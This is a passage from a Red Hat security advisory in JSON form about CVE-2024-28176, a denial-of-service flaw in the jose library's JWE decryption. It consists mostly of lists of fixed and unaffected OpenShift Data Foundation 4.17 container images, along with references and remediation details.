"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268820"
}
],
"notes": [
{
"category": "description",
"text": "Jose was found to have an uncontrolled resource consumption vulnerability. Under certain conditions, the user\u0027s environment can consume an unreasonable amount of CPU time or memory during JWE decryption operations, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jose: resource exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28176"
},
{
"category": "external",
"summary": "RHBZ#2268820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268820"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28176"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28176",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28176"
},
{
"category": "external",
"summary": "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q",
"url": "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q"
}
],
"release_date": "2024-03-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
